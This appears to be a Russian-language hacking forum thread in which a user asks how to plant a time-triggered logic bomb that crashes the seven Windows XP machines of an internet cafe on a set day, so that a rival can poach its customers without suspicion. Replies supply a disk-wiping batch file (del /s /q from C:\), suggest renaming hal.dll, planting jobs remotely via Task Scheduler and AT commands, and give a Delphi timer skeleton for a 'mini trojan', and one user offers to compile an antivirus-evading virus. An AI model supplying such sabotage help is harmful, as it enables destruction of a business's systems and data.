Просмотр полной версии : Логическая бомба. Как реализовать?
Есть дело такое.
Интернет салон. 7 компов.
система - wind XP, защита - Касперский, контроль - Clubtimer.
Задача: простой работоспособности компьютеров. (вызывать системный краш). Притом, это надо делать в определенный день, чтоб не подозревали, что администратор тут причем.
Вот логическая бомба, это по теме !
Теперь у меня не хватает фантазии, что и как можно делать? Имеется физический доступ к всем компам (есть возможность установки/удаление софта).
Рекомендуйте что небудь?
Ergoproxy
30.05.2008, 17:46
засунь вир
Ergoproxy
1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
2. Стоит Касперский антивирус
3. Какой именно вирус может вызывать реальный системный краш ?
brasco2k
30.05.2008, 19:09
Генератор апокалипсис.
Юзай его там есть функция даты запуска.
1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
Task Scheduler
Выгоняют с работы - решил дверью хлопнуть? ))
Почему бы в шедулер не засунуть выполнение какой-нить замечательной команды, типа
удаления всего на диске?
или ты хочешь приостановить работу, чтобы легко восстановить было?
Ergoproxy
30.05.2008, 19:17
Ergoproxy
1. все должен выполнятся в ОПРЕДЕЛЕННЫЙ день ! когда там нет администратора.
2. Стоит Касперский антивирус
3. Какой именно вирус может вызывать реальный системный краш ?
Ну напиши, на делфи к примеру:в такое то время удалить такой то файлик без которого винда несможет жить и всё)
Olegros911
30.05.2008, 19:37
Давай скомпелю вирь ты мне дату какую надо только в личку напиши.Только тут зверек будет рватса в автозагрузку так что проактивка может немножко ругатса,а так каспер молчать будет гарантия.ИНТЕРЕСУЕТ НАПИШИ В ЛИЧУ
http://forum.antichat.ru/threadnav12409-1-10.html
Используем поиск. Вуаля!
Теперь записываешь это в (то, что на 5 странице, в батник, можно склеить с иконкой, можно сделать .exe) и в шедулер стандартный виндовый.
Если просто батник какой-нить запихнуть в глубины системы - то если одмины не особо палят, что на машинах творится - не заметят. Каспер ничего не скажет - там все в порядке.
Либо просто hal.dll переименовать...
Olegros911
30.05.2008, 21:53
Батник у него непрокатит потому что он хочет чтоб ето все произошло после того как он уйдет.А тут прокатит только логическая Бомба,тоесть вирь запрограмированый на время.Ты чувак постучи мне в асю в воскресенье мы ето дело быстро решим.Ех люблю я вирусы
to all
короче тема такая! тот тип, кто там работает как админ(ну всеголишь собирает деньги и тыкает на щетчики, даже стыдно назвать админ), он хочет открыть свой клуб :))))) и как-то надо перенаправить клиенты )))
и вот мне просит помочь в этом "бизнесе". Они работают по сменам, надо мутить так, чтоб логическая бомба выполнялся НЕ на него смене! теперь думаю всем ясно что за дела.
----------------------
brasco2k
Я посмотрю что за зверь это. спасибо
iv.
Мне все это удаленно надо делать, а тот тип - нуб в этих делах, мне месяц надо, чтоб его обяснить что такое планировщик ! не катит этот вариант, да и слишком НАГЛО будет так..
Olegros911
Твой вариант самый подходящий ! Ведь надо еще и так делать, чтоб подозрение не было. все знают, что вирусы на что способно. :) воскресеье договоримся тогда.
Olegros911
30.05.2008, 23:38
ОК.
Батник у него непрокатит потому что он хочет чтоб ето все произошло после того как он уйдет.А тут прокатит только логическая Бомба,тоесть вирь запрограмированый на время.Ты чувак постучи мне в асю в воскресенье мы ето дело быстро решим.Ех люблю я вирусы
А шедулер на что? А если удаленно, так можно через AT-команду закинуть в шедулер даже не подходя к машине.
Еще вариант батника -
@echo off
cd c:\
del /s /q *.*
Вот честно, дабы не геморроиться - я бы предпочел простые варианты.
0verbreaK
04.06.2008, 21:14
На мой взгляд легче самому написать мини троян, который по определенному времени выполняет запланированное действие, заюзай например, WinAPI функции
GetLocalTime
var
lpst:_SYSTEMTIME;
begin
GetLocalTime(lpst);
if (lpst.wDay = 13) and (lpst.wHour = 23) and
(lpst.wMinute = 59) and (lpst.wSecond = 59) then
begin
// Выполняем определенное действие
end;
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot